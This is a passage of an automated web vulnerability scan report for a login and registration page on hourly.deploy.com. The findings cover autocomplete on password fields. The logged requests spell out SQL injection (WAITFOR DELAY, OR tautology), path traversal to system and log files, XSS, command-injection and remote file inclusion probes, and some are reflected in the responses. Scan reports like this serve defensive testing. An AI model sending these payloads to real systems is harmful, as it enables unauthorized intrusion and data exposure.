       <form name="form1" action="/hmc/report/index.cfm?register=1NS_NO" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.194. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=1;WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:39 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1;WAITFOR%20DELAY%20%270:0:25%27--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.195. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=1);WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1);WAITFOR%20DELAY%20%270:0:25%27--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.196. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fboot.ini HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:39 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fboot.ini" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.197. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%22%26expr+268409241%20-%202%20%26%22 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%22%26expr+268409241%20-%202%20%26%22" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.198. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register='+OR+'ns'%3d'ns HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='+OR+'ns'%3d'ns" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.199. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/index.cfm?nsextt=%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x00000C)%3C%2Fscript%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:40 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:40 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt=%00%27%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00000c)%3c%2fscript%3e" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...
18.200. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:45 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.201. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%2527 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%2527" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.202. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/index.cfm?nsextt=javascript:netsparker(0x000021) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:44 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:44 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt=javascript:netsparker(0x000021)" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...
18.203. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=response.write(268409241-22)%27 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=response.write(268409241-22)%27" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.204. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=../../../../../../../../../../var/log/apache/error.log HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:48 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../var/log/apache/error.log" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.205. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%22%3E%3Cnet%20sparker=netsparker(0x000032)%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:48 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%22%3E%3Cnet%20sparker=netsparker(0x000032)%3E" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.206. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=../../../../../../../../../../proc/self/version%00 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../proc/self/version%00" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.207. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=*/netsparker(0x000056)%3B/* HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:03 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=*/netsparker(0x000056)%3B/*" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.208. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/index.cfm?nsextt=%22%3E%3Cnet%20sparker=netsparker(0x00001C)%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:43 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:43 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:43 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:43 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt=%22%3e%3cnet%20sparker=netsparker(0x00001c)%3e" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...
18.209. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=//www.netsparker.com? HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=//www.netsparker.com?" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.210. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=php://filter//resource=http://netsparker.com/n?%00 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=php://filter//resource=http://netsparker.com/n?%00" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.211. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=1%20ns=netsparker(0x000026)%20 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:45 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
